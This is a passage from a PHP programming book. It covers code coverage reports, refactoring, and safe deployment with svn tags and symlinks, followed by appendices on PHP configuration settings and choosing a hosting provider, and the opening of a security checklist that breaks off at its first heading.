    $ phpunit --report UnitTest

The --report switch expects a directory argument. When it’s run in this fashion, PHPUnit generates code coverage reports after the tests are performed, and saves them as HTML files in the directory you specify. You can then browse these reports in a web browser. For example, Figure 13.3 shows the report I generated while developing the Zend_Controller class in the Zend Framework.
  • 489. Figure 13.3. Code coverage report generated with PHPUnit and XDebug

As the legend in Figure 13.3 shows, the report defines three thresholds of code coverage:

■ 0–35%: low
■ 35–70%: medium
■ 70–100%: high

You can then drill down into individual files. A sample from Zend_Controller_Action is shown in Figure 13.4.
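The three bands in the legend can be expressed as a small function, which is handy if you want to flag files in your own scripts. This is a sketch under stated assumptions rather than anything PHPUnit provides: the name coverageLevel is hypothetical, and because the legend lists 35% and 70% in two bands each, the code assumes a boundary value belongs to the higher band.

```php
<?php
// Hypothetical helper mirroring the legend's three bands.
// Assumption: a boundary value (35 or 70) belongs to the higher band.
function coverageLevel(float $percent): string
{
    if ($percent < 0 || $percent > 100) {
        throw new InvalidArgumentException('Coverage must be between 0 and 100');
    }
    if ($percent < 35) {
        return 'low';
    }
    if ($percent < 70) {
        return 'medium';
    }
    return 'high';
}

foreach ([12.5, 35, 69.9, 85] as $percent) {
    echo $percent, '% => ', coverageLevel($percent), PHP_EOL;
}
```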
  • 490. Figure 13.4. Code coverage analysis of Zend_Controller_Action showing a sampling of untested, dead, and tested code

In a web browser, code coverage report output is color coded, with green marking code that has been executed, red marking code that was not executed, and orange marking “dead” code, or code that will never be executed (usually end braces). Comments, as well as function and class definitions, are never considered in code coverage.

By generating these reports frequently, you can quickly determine which files need more coverage, and which code needs testing.

Don’t Hold Out for 100%!

True 100% code coverage is impossible to achieve in most cases, though the report may show that it has been achieved. Often, code will be written to account for many different situations, and testing even one of those will exercise it, but there’s
  • 491. no way to test all cases. The general rule of thumb holds that test coverage of 85% or greater is excellent.

I’ve reviewed some of my old code, and it’s horrible. How can I make it better?

Of course, you’re one of those good developers who maintains their code rigorously, or, at the very least, you occasionally go back and review code you wrote six months or a year ago, right? And, as you learn new techniques or new approaches to problems, the code you wrote before suddenly looks like a mess of tangled, overcooked spaghetti.

Solution

The solution to the old-code nightmare is summed up in a single word: refactoring. Quite simply, refactoring is the act of revising a program to make it more readable, or incorporating better structure, while preserving the program’s functionality.

If your code has been unit tested previously, you have a great foundation for undertaking such a task. Create a new branch in your revision control system and start hacking away at your code. Run the existing tests regularly as you work to ensure that nothing breaks. Based on your changes, you may need to add new unit tests. Be wary of altering the existing unit tests, however, as this may lead to incompatibilities.

If the code in question has not been tested previously, you have a bit more work to do. Your first step should be to write unit tests for the existing code. This approach will effectively produce a contract for the new code, which must pass these tests. Additionally, in writing the tests, you’ll likely identify which areas of the code are most brittle and need to be rewritten, and uncover some bugs. Once your tests are finished, start the process of rewriting, running your test suite often.
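The idea of tests acting as a contract can be sketched without any testing framework. Everything in the example below is hypothetical: legacyTotal stands in for old code, refactoredTotal for its rewrite, and runContract for a test suite whose cases were recorded from the old code’s current behavior. With SimpleTest or PHPUnit the cases would live in test methods instead.

```php
<?php
// Legacy implementation (hypothetical): works, but is hard to read.
function legacyTotal($items)
{
    $t = 0;
    for ($i = 0; $i < count($items); $i++) {
        if ($items[$i]['qty'] > 0) {
            $t = $t + $items[$i]['qty'] * $items[$i]['price'];
        }
    }
    return $t;
}

// Refactored implementation: same behavior, clearer structure.
function refactoredTotal(array $items)
{
    $total = 0;
    foreach ($items as $item) {
        if ($item['qty'] > 0) {
            $total += $item['qty'] * $item['price'];
        }
    }
    return $total;
}

// The "contract": cases recorded from the legacy code's current behavior.
function runContract(callable $implementation): bool
{
    $cases = [
        [[], 0],
        [[['qty' => 2, 'price' => 5]], 10],
        [[['qty' => 0, 'price' => 5], ['qty' => 3, 'price' => 4]], 12],
        [[['qty' => -1, 'price' => 9]], 0],
    ];
    foreach ($cases as [$input, $expected]) {
        if ($implementation($input) !== $expected) {
            return false;
        }
    }
    return true;
}

var_dump(runContract('legacyTotal'), runContract('refactoredTotal'));
```

Because the same cases run against both versions, any behavioral change introduced during the rewrite shows up as a failed contract rather than as a surprise in production.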
  • 492. Discussion

Refactoring is a complex topic, and the solution presented here is the briefest of summaries. If you’d like to dig into a thorough discussion of the subject, I recommend a classic reference: Martin Fowler’s Refactoring.21

21 Martin Fowler, Refactoring (Reading, MA: Addison-Wesley Professional, 1999).

How can I deploy code safely?

As PHP developers, we don’t release code in the typical development model: code, build, package, release. More often than not, we find ourselves making tweaks on live systems, or deploying code directly onto a live web site. Problems arise in these situations, as we introduce the possibility of site breakage. How many times has a fix or a new feature broken your web site? How many times have you needed to roll back to the previous version of a project, but had no clean way to do so?

With any luck, you’re already on the way to solving many of these problems by following the examples shown previously in this chapter:

■ Use revision control software.
■ Maintain separate development and production branches of your site in your versioning system.
■ Tag your production branch prior to release.
■ Write and run unit tests for your code.
■ Make sure as much of your code as possible is being exercised by your unit tests.

Solutions

With those tools already in place, you have only a little way to go to reach the calm waters of safe code deployment.

Using Tags and Symlinks

First, set up a staging or quality-assurance server that can run off a checked-out copy of your production branch. This server can be a separate virtual host on the same machine as your production server (though that’s not recommended), or on a
  • 493. separate server entirely, preferably behind a firewall (you guessed it: this approach is recommended).

Once you’ve merged your changes from the development branch or trunk into your production branch, test the site. Use unit tests as well as visual testing in a browser; looking at your project can often reveal issues that your tests simply cannot find.

Once you’re confident that the site works to your satisfaction (or, even better, to your boss’s or client’s satisfaction), tag the production branch. I usually name my tags with a combination of the date and a summary of the changes being introduced, something like this:

    $ svn copy https://example.com/svn/project/branch/production \
        https://example.com/svn/project/tag/2007-01-01-NewYearAnnc \
        -m 'New Year announcements'

Create an export of the tag on your production server:

    $ svn export \
        https://example.com/svn/project/tag/2007-01-01-NewYearAnnc \
        /path/to/web/2007-01-01-NewYearAnnc

Then, when you’re ready to launch the changes, use a symlink. A symlink, or symbolic link, is a special directory entry in Unix-based operating systems. A symlink is not a literal directory entry, like a directory or file, but is a reference to another directory entry.

In this example, we’ll assume that /path/to/web/production is where your site is installed. This will be a symlink. When it comes time to launch, make a note of the location to which the symlink points, then execute the following commands:

    $ rm /path/to/web/production
    $ ln -s /path/to/web/2007-01-01-NewYearAnnc /path/to/web/production

If you need to roll back to the previous version, simply point the symlink to the previous install directory.
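The same switch can be scripted in PHP. The sketch below is a variation on the rm and ln pair rather than a transcription of it: it builds the new link under a temporary name and renames it over the old one, so the production link is never missing. It assumes a Unix-like system; the function name switchRelease, the .new suffix, and the 2006-12-01-Holiday directory are all hypothetical.

```php
<?php
// Hypothetical helper: repoint $link at $target without a window in which
// the link is missing. Assumes a Unix-like system, where rename() replaces
// an existing symlink in a single step.
function switchRelease(string $target, string $link): ?string
{
    // Remember where the link pointed so a rollback is possible.
    $previous = is_link($link) ? readlink($link) : null;

    // Build the new link under a temporary name, then move it into place.
    $temporary = $link . '.new';
    if (is_link($temporary)) {
        unlink($temporary);
    }
    if (!symlink($target, $temporary) || !rename($temporary, $link)) {
        throw new RuntimeException("Could not point $link at $target");
    }
    return $previous;
}

// Usage with throwaway directories standing in for /path/to/web.
$web = sys_get_temp_dir() . '/deploy-demo-' . uniqid();
mkdir("$web/2006-12-01-Holiday", 0777, true);
mkdir("$web/2007-01-01-NewYearAnnc", 0777, true);

switchRelease("$web/2006-12-01-Holiday", "$web/production");
$previous = switchRelease("$web/2007-01-01-NewYearAnnc", "$web/production");
echo 'Now serving: ', readlink("$web/production"), PHP_EOL;

// Rolling back is the same operation with the remembered target.
switchRelease($previous, "$web/production");
echo 'Rolled back to: ', readlink("$web/production"), PHP_EOL;
```

Returning the previous target takes care of the “make a note of the location” step, so a rollback needs no manual bookkeeping.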
  • 494. Using a Build System

Additional tasks will, more than likely, need to be undertaken during deployment. Often, user-generated content is not kept in the repository, so it will need to be transferred into the new installation directory prior to launch. If database changes have been made between versions, they will also need to be applied, or a separate database will need to be used, and content synchronized between production and the staging install. If many additional tasks, such as the ones mentioned here, are required when you deploy a new version of your web site, you may need to investigate using a build system that can take care of this sort of thing for you. Examples include:

GNU Make (http://www.gnu.org/software/make/)
    The venerable GNU Make can be used for much more than C code, and has been used in many projects successfully for performing site installation and upgrade tasks.

Phing (http://phing.info/trac/)
    Phing, short for “PHing Is Not GNU make,” is based on Apache Ant, a Java build system. With Phing, you use XML build files to create your build targets and tasks.

Take great care to determine all the tasks that you need to perform in order to successfully launch your site, and complete test runs on your development box regularly. The more numerous and complicated the tasks, the more likely you are to introduce errors. Adhere to the KISS principle (Keep It Simple, Stupid) as much as possible, and your project deployment will be more successful.

Discussion

If you have a team of programmers, make sure that the deployment process is so easy that any single member of your team could deploy it on his or her own box with a minimum of effort. The symlink method may seem overly simplistic, but, as I think I’ve mentioned, the simpler you can keep the deployment process, the greater the likelihood that it’ll be a success.
Ultimately, the success of any deployment will depend upon the overall development process, from planning, to coding, to final release—and everything in between. If you’re coding for extensibility, writing and running your unit tests, documenting your code, and making efficient and effective use of your
  • 495. revision control software, simple, reliable processes may be all you need when it comes to final deployment.

Summary

Best practices encompass a wide variety of topics, any one of which could be covered in a chapter of its own, or even a book. Many of the concerns we covered in this chapter may seem unimportant at first, especially if you’re the sole maintainer of your project, or work in a small group of like-minded developers. However, the first time you need to work on a public project, or with another team of developers (or, worse, delete your project tree or introduce an error into your project), the value of these practices will become readily apparent.

Revision control will quickly become your friend, particularly when you want to keep your production code stable while continuing development on your project, be it to add new features or fix bugs. When you need to develop a feature that touches many areas of code, being able to branch to keep your changes isolated from the main development trunk becomes an invaluable advantage.

Adopting a coding standard will save you many headaches as you have others review your code, and you review the code of others. If you all write in the same style, the code will be easier to read and decipher. Additionally, using sane file and class naming conventions will make it easier to find code for later revisions, and prevent the issues associated with naming collisions.

Code documentation is often overlooked. Tools like phpDocumentor make the documentation of your code, while you write it, much easier. Run phpDocumentor on your code base once, having written a few code blocks, and you’ll see how quickly you can generate API documentation merely by adding a few comments to your code.

I could have devoted an entire book to the subject of unit testing.
I’d even go so far as to say that unit testing is arguably the single best practice from this chapter that you should learn and incorporate into your daily routine. Testing your code will help you better define your interfaces, isolate them from each other, and develop more stable, reliable code. Write tests, and, more importantly, run them often. Run code coverage reports periodically to ensure that you exercise as much of your code as possible.
  • 496. Finally, an often-overlooked aspect of PHP development is the actual deployment process: the gritty details of pushing your code to the production server, and ensuring that you can roll back if it fails. Tools like GNU Make and Phing can help automate these tasks; however, don’t underestimate the simplicity of a good repository strategy and symlinks. Often the simplest solution is best!

I’ve only scratched the surface with the practices outlined in this chapter. Incorporate what you can into your daily habits, but also examine your processes constantly and ask yourself how you can perform tasks better. Refactoring your processes will ultimately be the most useful tool in your toolbox.
  • 497. Appendix A: PHP Configuration

This quick reference to PHP configuration covers the most important general settings you need to be aware of, either when running applications in a live environment, or because they impact upon security or the way you write code.

Configuration Mechanisms

The primary mechanism for configuring PHP is the php.ini file. As the master file, it provides you with control over all configuration settings. PHP’s manual contains a guide to configuring PHP,1 and documents all the available configuration options, and where they can be set.2 Note that some configuration options can only be set in the php.ini file, while others can be set in other locations as discussed later in this section.

Entries in the php.ini file generally take the following format:

    setting=value

Be sure to read the comments provided in the file before making changes, though. The comments describe a few tricks, such as include_path using a colon (:) as a separator on Unix and a semicolon (;) on Windows, that you’ll want to be aware of.

Most web hosts won’t allow you access to your php.ini file unless you have root access to the system, which is typically not the case if you’re using a cheap, shared hosting service. The alternative is to use .htaccess files to configure PHP (assuming the web server is Apache).

An .htaccess file is a plain text file that you place in a public web directory, and use to control the way Apache behaves when it comes to serving pages from that directory; for instance, you might identify in the .htaccess file the pages to which you’ll allow public access. Note that the effect of an .htaccess file is recursive: it applies to subdirectories as well.

1 http://www.php.net/manual/en/configuration.php
2 http://www.php.net/manual/en/ini.php
  • 498. In order for you to configure PHP with .htaccess files, your hosting provider must have applied the Apache setting AllowOverride Options or AllowOverride All to your web directory in Apache’s main httpd.conf configuration file. If that has been done, you can use two Apache directives to modify PHP’s configuration:

php_flag
    used for settings that have Boolean values (that is, on/off or 1/0), such as register_globals

php_value
    used to specify a string value for settings, such as the include_path setting

Here’s an example of an .htaccess file:

    # Switch off register globals
    php_flag register_globals off

    # Set the include path
    php_value include_path ".:/home/username/pear"

The final mechanism that controls PHP’s configuration is the group of functions that contains ini_set and ini_alter, which let you modify configuration settings, as well as ini_get, which allows you to check configuration settings, and ini_restore, which resets a setting to the default value defined by php.ini and any .htaccess files. Here’s an example in which using ini_set allows us to avoid having to define our host, user name, and password when connecting to MySQL:

    // Supply the connection defaults through PHP's configuration
    ini_set('mysql.default_host', 'localhost');
    ini_set('mysql.default_user', 'harryf');
    ini_set('mysql.default_password', 'secret');

    // mysql_connect() with no arguments falls back to those defaults
    if (!mysql_connect()) {
        echo mysql_error();
    } else {
        echo 'Success';
    }
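The round trip through ini_get, ini_set, and ini_restore can be seen with any setting that may be changed at runtime. The sketch below uses precision purely as a harmless stand-in; the choice of setting and the value 10 are assumptions made for illustration.

```php
<?php
// 'precision' is used here only because it is safe to change at runtime.
$setting = 'precision';

$original = ini_get($setting);          // value in effect at startup
$returned = ini_set($setting, '10');    // ini_set returns the old value on success
$changed  = ini_get($setting);          // the new value, as a string

ini_restore($setting);                  // back to the startup value
$restored = ini_get($setting);

printf("original=%s changed=%s restored=%s\n", $original, $changed, $restored);
```

Note that ini_set returns false when a setting cannot be changed from a script, so checking its return value is a quick way to find out whether a change took effect.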
  • 499. Be aware that for some settings, such as error_reporting, PHP provides alternative functions that perform effectively the same job as ini_set. You can use whichever approach you prefer.

Note that certain settings, such as register_globals, can only be usefully modified by php.ini or .htaccess, because such settings influence PHP’s behavior before it begins to execute your scripts.

Furthermore, some configuration settings can be changed only in php.ini; extension_dir, for instance, which tells PHP the directory in which PHP extensions can be found. For a complete reference on controlling settings, refer to The PHP Manual.3

Key Security and Portability Settings

Table A.1 shows the most important PHP settings that relate to the security and portability of your PHP scripts.

Includes and Execution Settings

Table A.2 shows the most important PHP settings that relate to includes, and how well your PHP scripts run.

3 http://www.php.net/ini_set
  • 500. Table A.1. Key Security and Portability Settings

Setting: register_globals
Default: off
Notes: This setting automatically creates global variables from incoming HTTP request variables, such as GET and POST. For security and portability reasons, it’s strongly recommended that you switch off this setting. See the section called “Turning register_globals Off” in Chapter 1 or http://www.php.net/register_globals/ for more details.

Setting: magic_quotes_gpc
Default: off
Notes: This setting automatically escapes quotes in incoming HTTP request variables with a backslash, helping to prevent SQL injection attacks. If you know what you’re doing, it’s usually better to switch off this functionality and handle the escaping yourself when inserting data into a database, given the problems this feature can cause with forms, and the performance overhead it introduces. See the section called “Checking for Magic Quotes” in Chapter 1 for information on making your scripts compatible with this feature.

Setting: call_time_pass_reference
Default: off
Notes: This setting allows you to use variable references (e.g. htmlentities(&$string)) at call time. To keep code clean and understandable, and to ensure its portability, keep this functionality switched off.

Setting: short_open_tag
Default: on
Notes: This setting allows you to start a block of PHP code with just <? instead of the longer <?php. It also lets you write out PHP expressions with <?=, which is identical to <?php echo. While convenient, these shortcuts are not XML compliant, and can cause the PHP processor to become confused when it encounters XML processing instructions such as <?xml version="1.0"?>. Many people have short_open_tag switched off, so, for maximum portability, avoid the shortcuts and switch off this feature during development.
  • 501. Setting: asp_tags
Default: off
Notes: A setting that allows ASP-style tags (<% … %>) to be used as an alternative to the PHP open and close tags (<?php … ?>). Few people use this feature, so, for maximum portability, it’s best to avoid these tags, and switch off this feature during development.

Setting: error_reporting
Default: E_ALL & ~E_NOTICE
Notes: When developing, and for maximum portability, it’s best to set this option to E_ALL (or E_ALL | E_STRICT in PHP 5), so that PHP will inform you of situations where, for example, a $_GET variable your code relies upon has not been initialized. This forces you to write code that’s more secure and contains fewer logic errors, in order to avoid warnings. This also ensures that your code will run neatly on other servers configured this way.

Setting: display_errors
Default: on
Notes: This setting determines whether or not PHP sends error messages to the browser. When you’re running your application in a live environment, it’s generally better to switch off this option, and instead to use PHP’s logging mechanism to capture errors to a file, for example.

Setting: open_basedir
Default: not set
Notes: This setting allows you to restrict all PHP file operations to a given directory and its subdirectories. This can be a good idea if, for example, you want to prevent a script that’s used to display the contents of files from being used to access sensitive files elsewhere on your server.

Setting: allow_url_fopen
Default: on
Notes: This setting allows you to specify remote file locations for use with functions like fopen (e.g. fopen('http://www.sitepoint.com/','r');). It’s a handy tool but is also potentially a security risk for a badly written script. Switch it off if you know you don’t need it.
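The advice on error_reporting and display_errors can be applied from a script when you cannot edit php.ini. The following is a minimal sketch, assuming both settings may be changed at runtime on your server; the function name configureErrors and the environment names are hypothetical. It also shows the error_reporting function doing the same job as ini_set would.

```php
<?php
// Hypothetical helper: apply error settings for a named environment.
function configureErrors(string $environment): void
{
    // Report everything in both environments; only the destination differs.
    error_reporting(E_ALL);

    if ($environment === 'production') {
        ini_set('display_errors', '0'); // never show errors to visitors
        ini_set('log_errors', '1');     // record them instead
    } else {
        ini_set('display_errors', '1'); // show errors while developing
    }
}

configureErrors('production');
echo 'display_errors=', ini_get('display_errors'), PHP_EOL;
```

Errors that occur before this code runs, such as parse errors in the same file, are still governed by php.ini or .htaccess, which is why those remain the better place for these settings.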
  • 502. Table A.2. Includes and Execution Settings

Setting: include_path
Default: '.'
Notes: This setting allows you to specify the relative and absolute paths that PHP should search when you use one of the include-related commands. Make sure you specify at least the current directory (.), or most third-party scripts will fail to work. On Unix systems, the list of directories is separated by colons (:), while on Windows the separator is a semicolon (;). To make your life easier, the constant PATH_SEPARATOR is set to represent the correct character based on the operating system, making it easier to produce cross-platform-compatible code.

Setting: auto_prepend_file
Default: not set
Notes: PHP will execute the file(s) specified in this setting before executing any requested script. This setting is useful for performing site-wide operations such as security, logging, defining error handlers, stripping backslashes added by the magic quotes feature, and so on. It’s also useful for applications that you’re sure you will only use yourself, but is unsuitable for use in code you intend to distribute, as those who are unable to modify php.ini settings with .htaccess files will be unable to use such code. The list separator is the same as that used for the include_path setting.

Setting: auto_append_file
Default: not set
Notes: The twin of auto_prepend_file, the file named in this setting is executed after a requested script is executed.

Setting: max_execution_time
Default: 30
Notes: This setting specifies the maximum execution time (in seconds) for which a PHP script run via a web server may be allowed to execute. Generally, it’s best to leave this as the default setting and use the set_time_limit function to extend the limit on a per-script basis. A value of 0 for either the setting or the function removes the limit on script execution time.
  • 503. Setting: memory_limit
Default: 8M
Notes: This setting determines the amount of memory PHP has available to it at runtime. Usually, the default is fine, but when you’re handling very large XML documents, for example, or dealing with images, you might need to increase it. The bigger this value, the more memory a script may use, and the less memory will be available for other applications running on your server.

Setting: post_max_size
Default: 8M
Notes: This setting reflects the maximum amount of data that PHP will accept via an HTTP POST (e.g. a form that uploads an image). You might need to increase this value if you have an application that will allow users to upload bigger files.
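Two of the settings in Table A.2 are commonly adjusted from within a script. The sketch below builds an include path with PATH_SEPARATOR, so the same code works on Unix and Windows, and raises the time limit for a single script with set_time_limit. The helper name addIncludePaths and the 60-second limit are assumptions chosen for illustration, and /home/username/pear is simply the example path from the .htaccess listing.

```php
<?php
// Hypothetical helper: append directories to include_path portably.
function addIncludePaths(array $directories): string
{
    // Split the current path, dropping any empty entries.
    $paths = array_values(array_filter(explode(PATH_SEPARATOR, get_include_path()), 'strlen'));
    foreach ($directories as $directory) {
        if (!in_array($directory, $paths, true)) {
            $paths[] = $directory;
        }
    }
    // PATH_SEPARATOR is ':' on Unix-like systems and ';' on Windows.
    $includePath = implode(PATH_SEPARATOR, $paths);
    set_include_path($includePath);
    return $includePath;
}

// Always keep the current directory on the path.
echo addIncludePaths(['.', '/home/username/pear']), PHP_EOL;

// Extend the time limit for this script only, leaving max_execution_time alone.
set_time_limit(60);
```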
  • 504. Error-related Settings

Table A.3 shows the most important PHP settings that relate to the way PHP handles errors. Note that display_errors and error_reporting are not included here, as they were described in Table A.1.

Table A.3. Error-related Settings

Setting: log_errors
Default: off
Notes: This setting, in conjunction with error_log (below), allows you to log errors to a text file. It’s useful for a live site where you’ve switched off the display of errors to visitors.

Setting: error_log
Default: not set
Notes: This setting allows you to specify the name of a file to which errors are logged when log_errors is switched on.

Setting: ignore_repeated_errors
Default: off
Notes: Using this setting, if the same error occurs multiple times from the same line of a given PHP script, the error will only be reported once per script execution. This setting helps prevent the massive log files that can result from errors that occur in loops and are logged to a text file.

Setting: ignore_repeated_source
Default: off
Notes: This setting is similar to ignore_repeated_errors, but, in this case, it suppresses repeated errors of the same type throughout a PHP script.

Setting: report_memleaks
Default: on
Notes: Make sure this setting is switched on, especially if you’re using experimental versions or nonstable releases of PHP. Otherwise, you might end up crashing your server once leaked memory has eaten up all the available space. error_reporting must be set to report warnings for this setting to apply.
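The pairing of log_errors and error_log can be tried out in a few lines. This is a sketch under the assumption that both settings may be changed at runtime; the log file location and the message text are made up for the demonstration, and a real site would choose a path outside the web root.

```php
<?php
// A throwaway log file; a real site would use a path outside the web root.
$logFile = sys_get_temp_dir() . '/php-error-demo-' . uniqid() . '.log';

ini_set('log_errors', '1');       // turn logging on
ini_set('error_log', $logFile);   // send log entries to our file
ini_set('display_errors', '0');   // keep messages away from visitors

// error_log() writes through the same mechanism PHP uses for its own errors.
error_log('Payment gateway timed out');

echo file_get_contents($logFile);
```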
  • 505. Miscellaneous Settings

Table A.4 shows additional important settings that you should be aware of in your PHP configuration.

Table A.4. Miscellaneous Settings

Setting: session.save_path
Default: /tmp
Notes: If you’re storing sessions in files on a Windows-based system, you’ll need to modify this setting to an available directory to which PHP can write session files.

Setting: session.use_cookies
Default: 1
Notes: This setting uses cookies to store the session ID on the client, rather than placing the session ID in the URL (which can present a risk to security).

Setting: extension_dir
Default: './'
Notes: This setting specifies the path under which compiled PHP extensions can be found. On Windows-based systems, it might be something like this: extension_dir = C:\php\extensions

Setting: extension
Default: (none listed)
Notes: On Windows-based systems only, this setting is used to identify all the extensions that should be loaded. The extensions specified should reside in the extension_dir path (above), for example, extension = php_xslt.dll.
  • 507. Appendix B: Hosting Provider Checklist

PHP, and, more generally, the LAMP combination of Linux, Apache, MySQL, and PHP/Perl/Python, are widely available via literally thousands of web hosts at very affordable prices. You can easily access quality web hosting that will suit 90% of your needs quite inexpensively. That said, not all PHP installations are created equal: their capabilities depend largely on the configuration settings defined in php.ini, as well as the extensions the host has installed for you. A number of general issues relating to the amount of control you’re given over your own environment also deserve consideration if you’re to avoid trouble later on.

This appendix summarizes the key issues you should investigate before paying for a hosting service. Contact potential providers and ask them to respond to each of these points. Follow up by asking for the opinions of other people who’ve used the service in question; there are many online forums where you’ll find people who are able to offer advice. Be aware, though, that the ratio of “knowledgeable” to “ignorant” people is stacked highly in favor of ignorance; familiarize yourself with technical details so that you’re able to verify that the answers you’re given are well informed.

Some of the points I’ve included here may seem a little extreme, but once you’ve been around the block a few times, you’ll probably want to get value for your money, rather than spending your Saturday mornings fixing the problems your host made for you on Friday night.

General Issues

Consider these issues whichever host you’re looking at; they’re the key markers of a decent service.

Does the host support Linux and Apache?

From the point of view of performance and reliability, the Linux–Apache setup is the best combination. Ask for details of the Linux distribution.
Although Red Hat and its derivatives (such as CentOS and Fedora) are popular, you might find that hosts using Debian or Ubuntu (or, better yet, Rock Linux) know more about what they’re doing.
  • 508. Avoid any host that uses Apache 2.x with a threaded multiprocessing module (MPM), as there are still many third-party libraries that aren’t thread safe. Stick with a host that offers Apache 2.x with the prefork MPM, or Apache 1.3.x.

Does the host provide you with SSH access to the server?

SSH gives you a secure connection to the server, through which you can perform tasks from the Linux command line, or transfer files with SCP (Secure Copy Protocol) or SFTP (SSH File Transfer Protocol). Avoid any host that allows you to use telnet, as this is a fundamentally insecure way to connect to a server over the Internet.

For Windows users, Putty1 makes an excellent SSH client and command line tool, while WinSCP2 provides a secure file transfer mechanism using an SSH connection. Alternatively, make sure you can upload files using FTPS (FTP over SSL). Don’t transfer files with FTP; it’s as insecure as telnet.

Is the host a reseller, or does it maintain servers itself?

Resellers can provide significant value if you need help at a basic technical level (if, for example, you’re a beginner), but they generally have the same level of control over the server as you do. Going “straight to the source” means you won’t have to deal with delays when there are system problems, as you’ll likely be dealing directly with those who maintain the server. The downside is that they tend to be less newbie tolerant, so you might get answers, but not ones you can understand!

To what degree does the host “overload” the server?

Many web hosting companies create far more accounts on a server than the maximum for which the system is specified. To gauge the degree of server overload, the best metric is obtained using the uptime command (if you have access to use it); this will tell you the server load averages over one, five, and 15 minutes. Ideally, the server should never have load averages above one.
Obviously, the issue isn’t really as simple as this, but once you see your server hit averages in excess of five, you’ll begin to experience significant delays in your PHP-based applications.

[1] http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
[2] http://winscp.net/eng/
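If the host gives you no shell access, PHP can report the same load averages that uptime prints. The following is a minimal sketch, not a monitoring tool: the function names and the "ideal", "busy", and "overloaded" labels are illustrative assumptions, and the thresholds are simply the rough figures of one and five quoted above.

```php
<?php
/**
 * Classify a set of load averages using the rough thresholds from the
 * text: nothing above 1 is ideal, anything above 5 means trouble.
 * The labels themselves are hypothetical, chosen for this sketch.
 */
function describeLoad(array $averages)
{
    $worst = max($averages);
    if ($worst <= 1.0) {
        return 'ideal';
    }
    if ($worst <= 5.0) {
        return 'busy';
    }
    return 'overloaded';
}

/**
 * Return the label for the current server load, or null when the load
 * cannot be read (sys_getloadavg() is not available on Windows).
 */
function currentLoadStatus()
{
    if (!function_exists('sys_getloadavg')) {
        return null;
    }
    $averages = sys_getloadavg(); // 1, 5 and 15 minute averages
    return $averages === false ? null : describeLoad($averages);
}
```

Calling currentLoadStatus() from a small script at different times of day gives a rough picture of how heavily the server is shared.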
What’s the hosting provider’s policy on running scripts and programs from the command line?
mysqldump is a very handy tool for backing up your database, but it’s no good if you can’t run it on your server. Some hosts automatically kill any command line application that executes for longer than a given time, so be sure to investigate this issue.

Does the host provide you access to cron, the Unix utility that allows you to schedule batch jobs?
If so, make sure the host allows command line scripts to be executed. Some hosts have taken to implementing cron so that it executes scripts via a web URL, but this is no use if the script in question uses mysqldump to back up your database: a PHP script executed via Apache will typically run as the web server’s user, which will not have the permissions required for the job.

PHP-related Issues
These considerations relate specifically to PHP and the way it’s set up on the server.

Can you see the output of phpinfo on the server you will actually be assigned to?
Some hosts might claim this is a security risk, but expert hosts know that security by obscurity is no substitute for real security. The information provided by phpinfo is not a security risk to hosting providers that know what they’re doing, and have Linux, Apache, and firewalls correctly set up. What phpinfo tells you is the best way to confirm the facts.

Is PHP installed as an Apache module (not the CGI variant)?
PHP installed as an Apache module provides much better performance than if PHP is running in CGI mode.
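One quick way to answer the Apache module question yourself is to ask PHP which server API it is running under. This is a small sketch under stated assumptions: isApacheModuleSapi is a hypothetical helper name, and the check relies on the SAPI names PHP reports for the Apache module ("apache", "apache2handler", "apache2filter") as opposed to the CGI builds ("cgi", "cgi-fcgi").

```php
<?php
/**
 * Report whether a SAPI name, as returned by php_sapi_name(), belongs
 * to the Apache module rather than to a CGI variant.
 */
function isApacheModuleSapi($sapi)
{
    // Apache module names all start with "apache"
    return strpos($sapi, 'apache') === 0;
}
```

In a page served by the host, `echo isApacheModuleSapi(php_sapi_name()) ? 'module' : 'not a module';` prints the answer; the same value appears as "Server API" in the phpinfo output.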
Is the Apache setting AllowOverride set to Options or All?
This setting will let you modify php.ini settings with .htaccess files.

Is PHP Safe Mode disabled?
The safe_mode option in php.ini is, in theory, a way to make PHP secure, and prevent users from performing certain tasks or using certain functions that are security sensitive. In practice, Safe Mode is nothing but a large headache if you’re doing any serious work in PHP.

Check the upgrade policy of your host.
Ask the host how much warning you will get before upgrades are performed. Check that they’ll provide you with a copy of the php.ini file they’ll be using for the upgrade before it happens; a considerable number of hosts switch from register_globals=on to register_globals=off overnight. Make sure you test your applications on your development system against the new version before the host performs the upgrade.

Ask for a list of installed PHP extensions.
Confirm that these extensions match the requirements of your applications; few hosts, for example, bother to provide the XSLT extension. Confirm also that the host guarantees that all extensions will remain available between PHP upgrades.

Will PHP be available for use from the command line?
If not, you might alternatively require access to Perl or Python, or the ability to run shell scripts, if you’re happy with those languages. Usually, running a serious web site will require that you have the ability to run routine batch jobs (with cron) for tasks like backups, mailing yourself the PHP error log, and so on.

What’s the host’s knowledge of PHP?
Last but not least, throw in one or two questions that will test your hosting provider’s knowledge of PHP. Although it might not be the host’s job to write PHP code, when you find yourself in the position of knowing a lot more about PHP than your host, the end result is depressing. It’s important to have a host that understands your needs.
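The extension question in the checklist above can also be verified from a script once you have an account, or a trial account, on the server. The sketch below assumes you keep your own list of required extension names; missingExtensions is a hypothetical helper, while extension_loaded is the standard PHP function it relies on.

```php
<?php
/**
 * Return the names from $required that are not loaded in this PHP
 * build. An empty array means every requirement is met.
 */
function missingExtensions(array $required)
{
    $missing = array();
    foreach ($required as $name) {
        if (!extension_loaded($name)) {
            $missing[] = $name;
        }
    }
    return $missing;
}
```

For example, `print_r(missingExtensions(array('xsl', 'gd', 'pdo_mysql')));` lists whichever of those three the host has not installed. Rerunning the check after each PHP upgrade is a cheap way to confirm that extensions have remained available.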
Appendix C: Security Checklist

Given that online PHP applications are exposed essentially to anyone and everyone, security should be on, if not at the top of, your list of concerns as you develop your applications. To some extent, the ease with which PHP applications can be developed is also one of the language’s greatest weaknesses: for beginners who aren’t aware of the possible dangers, it’s very easy to deploy an application for which the line of security has as many holes as Swiss cheese. Make sure you’re informed and, if in any doubt, prepared to ask questions.

The Open Web Application Security Project (OWASP) is a corporate-sponsored community focused on raising the awareness of web security, and is an excellent source of information on potential dangers.[1] OWASP recently updated its list of the top ten common security flaws in web applications, the relevant points of which I’ve summarized here. The previous version from 2004 still contains relevant information and, while there’s some duplication, it’s well worth a read.[2]

For a more detailed coverage of PHP security, you might like to read Essential PHP Security by Chris Shiflett,[3] and php|architect’s Guide to PHP Security by Ilia Alshanetsky.[4]

Top Security Vulnerabilities
This list comprises the most common, and most dangerous, security flaws found in web applications today.

Cross-site Scripting (XSS)
